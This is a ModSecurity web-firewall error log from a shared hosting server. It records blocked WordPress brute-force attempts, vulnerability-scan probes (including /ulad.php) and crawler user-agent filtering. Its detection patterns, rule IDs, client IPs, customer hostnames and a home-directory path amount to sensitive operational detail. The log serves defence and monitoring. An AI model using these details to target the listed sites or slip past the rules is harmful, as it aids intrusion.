[Tue May 26 14:11:50.336182 2026] [security2:error] [pid 585807:tid 586026] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVczeHp6I37JgAKrHUijwAAAN0"]
[Tue May 26 14:11:50.903427 2026] [security2:error] [pid 585807:tid 585982] [client 45.148.10.204:37472] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUiqAAAALE"]
[Tue May 26 14:11:50.944132 2026] [security2:error] [pid 585807:tid 585951] [client 45.148.10.204:37486] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUiqQAAAJM"]
[Tue May 26 14:11:50.979903 2026] [security2:error] [pid 585807:tid 586007] [client 45.148.10.204:37638] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "earthone.me"] [uri "/earthone.me/wp-content/themes/bizberg/assets/js/jquery.inview.min.js"] [unique_id "ahVczuHp6I37JgAKrHUivQAAAMo"]
[Tue May 26 14:11:51.002052 2026] [security2:error] [pid 585807:tid 585941] [client 45.148.10.204:37522] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUirQAAAIk"]
[Tue May 26 14:11:51.006004 2026] [security2:error] [pid 585807:tid 585975] [client 45.148.10.204:37516] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUirwAAAKo"]
[Tue May 26 14:11:51.015466 2026] [security2:error] [pid 585807:tid 585974] [client 45.148.10.204:37500] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUirgAAAKk"]
[Tue May 26 14:11:51.026187 2026] [security2:error] [pid 585807:tid 585976] [client 45.148.10.204:37544] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUitAAAAKs"]
[Tue May 26 14:11:51.069947 2026] [security2:error] [pid 585807:tid 586037] [client 45.148.10.204:37562] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUiugAAAOg"]
[Tue May 26 14:11:51.077935 2026] [security2:error] [pid 585807:tid 585964] [client 45.148.10.204:37528] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUitwAAAJ8"]
[Tue May 26 14:11:51.091384 2026] [security2:error] [pid 585807:tid 585955] [client 45.148.10.204:37590] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUivAAAAJc"]
[Tue May 26 14:11:51.106917 2026] [security2:error] [pid 585807:tid 586001] [client 45.148.10.204:37600] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUivgAAAMQ"]
[Tue May 26 14:11:51.106926 2026] [security2:error] [pid 585807:tid 585971] [client 45.148.10.204:37624] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUiwQAAAKY"]
[Tue May 26 14:11:51.116146 2026] [security2:error] [pid 585807:tid 585968] [client 45.148.10.204:37652] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUiwgAAAKM"]
[Tue May 26 14:11:51.120356 2026] [security2:error] [pid 585807:tid 586013] [client 45.148.10.204:37552] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUiuwAAANA"]
[Tue May 26 14:11:51.120695 2026] [security2:error] [pid 585807:tid 585998] [client 45.148.10.204:37576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUivwAAAME"]
[Tue May 26 14:11:51.121770 2026] [security2:error] [pid 585807:tid 585958] [client 45.148.10.204:37564] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUiwAAAAJk"]
[Tue May 26 14:11:51.123679 2026] [security2:error] [pid 585807:tid 585940] [client 45.148.10.204:37610] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVczuHp6I37JgAKrHUiuQAAAIg"]
[Tue May 26 14:11:51.155826 2026] [security2:error] [pid 585807:tid 586031] [client 45.148.10.204:37658] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUiwwAAAOI"]
[Tue May 26 14:11:51.160671 2026] [security2:error] [pid 585807:tid 585996] [client 45.148.10.204:37688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUixQAAAL8"]
[Tue May 26 14:11:51.166062 2026] [security2:error] [pid 585807:tid 586062] [client 45.148.10.204:37672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUixAAAAQA"]
[Tue May 26 14:11:51.210287 2026] [security2:error] [pid 585807:tid 586018] [client 45.148.10.204:37708] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUizAAAANU"]
[Tue May 26 14:11:51.290090 2026] [security2:error] [pid 585807:tid 586023] [client 45.148.10.204:37724] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUizQAAANo"]
[Tue May 26 14:11:51.356080 2026] [security2:error] [pid 585807:tid 585962] [client 45.148.10.204:37736] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUizgAAAJ0"]
[Tue May 26 14:11:51.364847 2026] [security2:error] [pid 585807:tid 586048] [client 45.148.10.204:37746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUizwAAAPI"]
[Tue May 26 14:11:51.367457 2026] [security2:error] [pid 585807:tid 585954] [client 45.148.10.204:37754] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi1QAAAJY"]
[Tue May 26 14:11:51.375405 2026] [security2:error] [pid 585807:tid 586033] [client 45.148.10.204:37738] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi1AAAAOQ"]
[Tue May 26 14:11:51.376108 2026] [security2:error] [pid 585807:tid 586056] [client 45.148.10.204:37744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi0wAAAPo"]
[Tue May 26 14:11:51.397121 2026] [security2:error] [pid 585807:tid 586043] [client 45.148.10.204:37722] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi0QAAAO0"]
[Tue May 26 14:11:51.415387 2026] [security2:error] [pid 585807:tid 585938] [client 45.148.10.204:37758] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi2gAAAIY"]
[Tue May 26 14:11:51.423472 2026] [security2:error] [pid 585807:tid 586017] [client 45.148.10.204:37694] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi0gAAANQ"]
[Tue May 26 14:11:51.428398 2026] [security2:error] [pid 585807:tid 586014] [client 45.148.10.204:37774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi2AAAANE"]
[Tue May 26 14:11:51.446545 2026] [security2:error] [pid 585807:tid 586045] [client 45.148.10.204:37760] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi1wAAAO8"]
[Tue May 26 14:11:51.450192 2026] [security2:error] [pid 585807:tid 585946] [client 45.148.10.204:37790] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi1gAAAI4"]
[Tue May 26 14:11:51.453274 2026] [security2:error] [pid 585807:tid 586055] [client 45.148.10.204:37816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi2wAAAPk"]
[Tue May 26 14:11:51.454396 2026] [security2:error] [pid 585807:tid 585970] [client 45.148.10.204:37814] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi2QAAAKU"]
[Tue May 26 14:11:51.455311 2026] [security2:error] [pid 585807:tid 586002] [client 45.148.10.204:37806] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi4AAAAMU"]
[Tue May 26 14:11:51.466778 2026] [security2:error] [pid 585807:tid 585956] [client 45.148.10.204:37756] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi3AAAAJg"]
[Tue May 26 14:11:51.474121 2026] [security2:error] [pid 585807:tid 586049] [client 45.148.10.204:37852] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi4wAAAPM"]
[Tue May 26 14:11:51.475906 2026] [security2:error] [pid 585807:tid 586036] [client 45.148.10.204:37822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi4gAAAOc"]
[Tue May 26 14:11:51.483307 2026] [security2:error] [pid 585807:tid 586029] [client 45.148.10.204:37836] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi4QAAAOA"]
[Tue May 26 14:11:51.487571 2026] [security2:error] [pid 585807:tid 586026] [client 45.148.10.204:37826] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi5AAAAN0"]
[Tue May 26 14:11:51.624512 2026] [security2:error] [pid 585807:tid 585984] [client 45.148.10.204:37860] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi6QAAALM"]
[Tue May 26 14:11:51.761036 2026] [security2:error] [pid 585807:tid 586011] [client 45.148.10.204:37872] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi6gAAAM4"]
[Tue May 26 14:11:51.823402 2026] [security2:error] [pid 585807:tid 586054] [client 45.148.10.204:37878] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVcz-Hp6I37JgAKrHUi7wAAAPg"]
[Tue May 26 14:11:53.058319 2026] [security2:error] [pid 585807:tid 585962] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc0OHp6I37JgAKrHUjCgAAAJ0"]
[Tue May 26 14:11:53.113017 2026] [security2:error] [pid 585807:tid 585956] [client 85.208.96.212:10282] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVc0eHp6I37JgAKrHUjEgAAAJg"]
[Tue May 26 14:11:53.113132 2026] [security2:error] [pid 585807:tid 585956] [client 85.208.96.212:10282] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVc0eHp6I37JgAKrHUjEgAAAJg"]
[Tue May 26 14:11:54.324519 2026] [security2:error] [pid 585807:tid 585819] [remote 95.216.117.13:34620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVc0uHp6I37JgAKrHUjKgAA2As"]
[Tue May 26 14:11:55.379915 2026] [security2:error] [pid 585807:tid 585954] [client 31.57.184.20:63164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "keydussecurity.com"] [uri "/wp-login.php"] [unique_id "ahVc0-Hp6I37JgAKrHUjQQAAAJY"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 14:11:55.776950 2026] [security2:error] [pid 585807:tid 586029] [client 31.57.184.20:63550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "keydussecurity.com"] [uri "/wp-login.php"] [unique_id "ahVc0-Hp6I37JgAKrHUjUgAAAOA"], referer: https://wordpress.org/
[Tue May 26 14:11:55.894310 2026] [security2:error] [pid 585807:tid 585830] [remote 74.7.241.58:33064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVc0-Hp6I37JgAKrHUjVgAA5xY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 14:11:55.975359 2026] [security2:error] [pid 585807:tid 585937] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc0-Hp6I37JgAKrHUjRAAAAIU"]
[Tue May 26 14:11:57.516678 2026] [security2:error] [pid 585807:tid 585986] [client 202.141.30.10:35580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVc1eHp6I37JgAKrHUjoAAAALU"]
[Tue May 26 14:11:57.516832 2026] [security2:error] [pid 585807:tid 585986] [client 202.141.30.10:35580] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVc1eHp6I37JgAKrHUjoAAAALU"]
[Tue May 26 14:11:57.689317 2026] [security2:error] [pid 585807:tid 585994] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc1eHp6I37JgAKrHUjjgAAAL0"]
[Tue May 26 14:11:59.869807 2026] [security2:error] [pid 585807:tid 586019] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc1-Hp6I37JgAKrHUj0gAAANY"]
[Tue May 26 14:12:02.149758 2026] [security2:error] [pid 585807:tid 585946] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc2eHp6I37JgAKrHUkGAAAAI4"]
[Tue May 26 14:12:04.344063 2026] [security2:error] [pid 585807:tid 585988] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc2-Hp6I37JgAKrHUkRQAAALc"]
[Tue May 26 14:12:04.445033 2026] [security2:error] [pid 585807:tid 586033] [client 202.76.185.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc3OHp6I37JgAKrHUkSwAAAOQ"]
[Tue May 26 14:12:05.929658 2026] [security2:error] [pid 585807:tid 586022] [client 145.239.10.137:53723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/ulad.php"] [unique_id "ahVc3eHp6I37JgAKrHUkdgAAANk"], referer: http://kexcouriers.com/ulad.php
[Tue May 26 14:12:06.159885 2026] [security2:error] [pid 585807:tid 586048] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc3eHp6I37JgAKrHUkbwAAAPI"]
[Tue May 26 14:12:08.396537 2026] [security2:error] [pid 585807:tid 585974] [client 202.141.30.10:35359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVc4OHp6I37JgAKrHUkvwAAAKk"]
[Tue May 26 14:12:08.396714 2026] [security2:error] [pid 585807:tid 585974] [client 202.141.30.10:35359] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVc4OHp6I37JgAKrHUkvwAAAKk"]
[Tue May 26 14:12:08.425298 2026] [security2:error] [pid 585807:tid 586030] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc3-Hp6I37JgAKrHUksQAAAOE"]
[Tue May 26 14:12:10.696867 2026] [security2:error] [pid 585807:tid 585976] [client 114.119.157.37:56763] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/gift-item-04/"] [unique_id "ahVc4uHp6I37JgAKrHUk9AAAAKs"], referer: http://haddingtonwines.com/products/chocolate-ginger/
[Tue May 26 14:12:11.193982 2026] [security2:error] [pid 585807:tid 585942] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc4uHp6I37JgAKrHUk-AAAAIo"]
[Tue May 26 14:12:12.963974 2026] [security2:error] [pid 585807:tid 585960] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc5OHp6I37JgAKrHUlLAAAAJs"]
